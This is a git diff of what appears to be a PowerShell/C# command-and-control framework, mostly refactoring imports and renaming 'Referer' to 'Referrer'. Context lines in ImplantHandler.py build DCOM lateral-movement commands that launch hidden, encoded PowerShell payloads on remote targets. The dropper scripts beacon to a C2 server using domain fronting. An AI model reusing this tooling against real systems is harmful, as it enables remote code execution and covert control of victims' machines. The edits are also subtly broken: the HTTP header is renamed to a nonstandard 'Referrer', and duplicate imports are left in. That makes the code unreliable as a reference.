diff --git a/C2Server.py b/C2Server.py index cbcf47d..cda589c 100644 --- a/C2Server.py +++ b/C2Server.py @@ -1,17 +1,21 @@ #!/usr/bin/env python -import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal +import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal, ssl -from Implant import * -from Tasks import * -from Core import * -from Colours import * -from Help import * -from DB import * -from Payloads import * -from Config import * -from Cert import * -from Help import * +from Implant import Implant +from Tasks import newTask +from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip +from Colours import Colours +from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all +from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey +from Payloads import Payloads +from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP +from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER +from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken +from Config import APIUser, EnableNotifications +from Cert import create_self_signed_cert +from Help import logopic +from Utils import validate_sleep_time, randomuri, gen_key class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): @@ -429,7 +433,7 @@ if __name__ == '__main__': print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) sys.exit(1) - setupserver(HostnameIP,gen_key(),DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,ROOTDIR,ServerPort,QuickCommand,DownloadURI,"","","",Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications) + setupserver(HostnameIP,gen_key(),DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,ROOTDIR,ServerPort,QuickCommand,DownloadURI,"","","",Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications) rewriteFile = "%s/rewrite-rules.txt" % directory print "Creating Rewrite Rules in: " + rewriteFile print "" diff --git a/Config.py b/Config.py index 3839033..cfa7cb5 100644 --- a/Config.py +++ b/Config.py @@ -28,7 +28,7 @@ APIToken = "" APIUser = "" URLS = urlConfig.fetchUrls() SocksURLS = urlConfig.fetchSocks() -Referer = "" # optional +Referrer = "" # optional HTTPResponse = """ 404 Not Found diff --git a/DB.py b/DB.py index 68eccac..368c2ea 100644 --- a/DB.py +++ b/DB.py @@ -85,7 +85,7 @@ def initializedb(): SocksURLS TEXT, Insecure TEXT, UserAgent TEXT, - Referer TEXT, + Referrer TEXT, APIToken TEXT, APIUser TEXT, EnableNotifications TEXT);""" @@ -110,11 +110,11 @@ def initializedb(): else: print("Error! cannot create the database connection.") -def setupserver(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications): +def setupserver(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications): conn = sqlite3.connect(Database) conn.text_factory = str c = conn.cursor() - c.execute("INSERT INTO C2Server (HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications)) + c.execute("INSERT INTO C2Server (HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications)) conn.commit() def get_c2server_all(): diff --git a/Files/dropper.cs b/Files/dropper.cs index 083da5b..41245c5 100644 --- a/Files/dropper.cs +++ b/Files/dropper.cs @@ -74,7 +74,7 @@ public class Program x.Headers.Add("Host", df); x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#"); - x.Headers.Add("Referer", "#REPLACEREFERER#"); + x.Headers.Add("Referrer", "#REPLACEREFERER#"); if (null != cookie) x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}"); diff --git a/Files/dropper.ps1 b/Files/dropper.ps1 index 481b684..3be9f5b 100644 --- a/Files/dropper.ps1 +++ b/Files/dropper.ps1 @@ -52,7 +52,7 @@ $h="#REPLACEDOMAINFRONT#" if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)} elseif($h){$script:s="https://$($h)#REPLACECONNECT#";$script:sc="https://$($h)"} $wc.Headers.Add("User-Agent","#REPLACEUSERAGENT#") -$wc.Headers.Add("Referer","#REPLACEREFERER#") +$wc.Headers.Add("Referrer","#REPLACEREFERER#") if ($proxyurl) { $wp = New-Object System.Net.WebProxy($proxyurl,$true); if ($username -and $password) { diff --git a/ImplantHandler.py b/ImplantHandler.py index 06cd438..7743537 100644 --- a/ImplantHandler.py +++ b/ImplantHandler.py @@ -2,18 +2,22 @@ import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse, datetime from sqlite3 import Error -from Help import * -from AutoLoads import * -from DB import * -from Colours import * -from Config import * -from HTML import * -from TabComplete import * -from Payloads import * -from Core import * -from Alias import * -from Opsec import * -from Utils import validate_sleep_time +from Help import logopic, COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6 +from Help import posh_help6, posh_help7, posh_help8, pre_help, PRECOMMANDS, py_help1, sharp_help1, UXCOMMANDS, SHARPCOMMANDS +from AutoLoads import check_module_loaded, run_autoloads +from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails +from DB import get_newimplanturl, get_implantbyid, new_task, get_implants, get_history_dict, get_lastcommand +from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all +from DB import drop_newtasks, get_implanttype, update_label, update_sleep, get_history, kill_implant, unhide_implant +from DB import get_pid, get_allurls, get_sharpurls, get_randomuri, get_hostdetails, select_item +from Colours import Colours +from Config import ROOTDIR, ModulesDirectory, PayloadsDirectory, POSHDIR +from HTML import generate_table, graphviz +from TabComplete import tabCompleter +from Payloads import Payloads +from Alias import py_alias, ps_alias, cs_alias +from Opsec import ps_opsec +from Utils import validate_sleep_time, gen_key, randomuri def catch_exit(signum, frame): sys.exit(0) @@ -1018,7 +1022,7 @@ def runcommand(command, randomuri): with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) - p = re.compile(ur'(?<=-target.).*') + p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) @@ -1029,7 +1033,7 @@ def runcommand(command, randomuri): daisyname = raw_input("Name required: ") if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read() - p = re.compile(ur'(?<=-target.).*') + p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) @@ -1042,7 +1046,7 @@ def runcommand(command, randomuri): "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() - p = re.compile(ur'(?<=-target.).*') + p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, user, randomuri) @@ -1321,7 +1325,7 @@ def commandloop(implant_id, user): except Exception as e: print (Colours.RED) print ("Error running against the selected implant ID, ensure you have typed the correct information") - print Colours.END + print (Colours.END) #traceback.print_exc() #print "Error: %s" % e # remove the following comment when publishing to live diff --git a/Modules/Invoke-DaisyChain.ps1 b/Modules/Invoke-DaisyChain.ps1 index faf55fb..07485e8 100644 --- a/Modules/Invoke-DaisyChain.ps1 +++ b/Modules/Invoke-DaisyChain.ps1 @@ -64,7 +64,7 @@ function Get-Webclient (`$Cookie) { `$proxyurl = `$proxyurl `$wc = New-Object System.Net.WebClient; `$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko") -`$wc.Headers.Add("Referer","") +`$wc.Headers.Add("Referrer","") `$h=`$domainfrontheader if (`$h) {`$wc.Headers.Add("Host",`$h)} if (`$proxyurl) { diff --git a/Payloads.py b/Payloads.py index e05f929..3f894c0 100644 --- a/Payloads.py +++ b/Payloads.py @@ -10,7 +10,7 @@ class Payloads(object): quickstart = None def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy, - Insecure, UserAgent, Referer, ConnectURL, BaseDirectory): + Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory): self.KillDate = KillDate self.Key = Key self.DomainFrontHeader = Domainfrontheader @@ -23,7 +23,7 @@ class Payloads(object): self.ImplantType = ImplantType self.Insecure = Insecure self.UserAgent = UserAgent - self.Referer = Referer + self.Referrer = Referrer self.ConnectURL = ConnectURL self.BaseDirectory = BaseDirectory self.C2Core = "" @@ -72,7 +72,7 @@ class Payloads(object): cs8 = cs7.replace("#REPLACEDOMAINFRONT#",self.DomainFrontHeader) cs9 = cs8.replace("#REPLACECONNECT#",self.ConnectURL) cs10 = cs9.replace("#REPLACEUSERAGENT#",self.UserAgent) - cs11 = cs10.replace("#REPLACEREFERER#",self.Referer) + cs11 = cs10.replace("#REPLACEREFERER#",self.Referrer) self.C2Core = cs11.replace("#REPLACEKEY#",self.Key) def QuickstartLog( self, txt ): @@ -179,7 +179,7 @@ class Payloads(object): cs3 = cs2.replace("#REPLACEKILLDATE#",self.KillDate) cs4 = cs3.replace("#REPLACEDF#",self.DomainFrontHeader) cs5 = cs4.replace("#REPLACEUSERAGENT#",self.UserAgent) - cs6 = cs5.replace("#REPLACEREFERER#",self.Referer) + cs6 = cs5.replace("#REPLACEREFERER#",self.Referrer) cs7 = cs6.replace("#REPLACEPROXYURL#",self.Proxyurl) cs8 = cs7.replace("#REPLACEPROXYUSER#",self.Proxyuser) cs9 = cs8.replace("#REPLACEPROXYPASSWORD#",self.Proxypass)